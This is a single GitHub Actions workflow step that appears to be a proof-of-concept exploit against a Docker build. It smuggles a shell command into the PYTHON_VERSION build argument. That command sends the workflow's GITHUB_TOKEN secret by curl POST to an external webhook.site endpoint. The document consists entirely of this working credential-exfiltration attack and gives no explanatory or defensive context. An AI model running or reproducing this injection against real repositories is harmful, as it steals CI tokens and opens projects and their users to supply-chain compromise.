- name: Trigger Token Leak via PYTHON_VERSION Injection
  run: |
    docker build \
      --build-arg PYTHON_VERSION='3.10 && curl -X POST -d "token=${{ secrets.GITHUB_TOKEN }}" https://webhook.site/529200f3-872d-4083-bf2d-b5c014761b69' \
      -f taskcluster/docker/python/Dockerfile \
      -t leaked-token-rce .
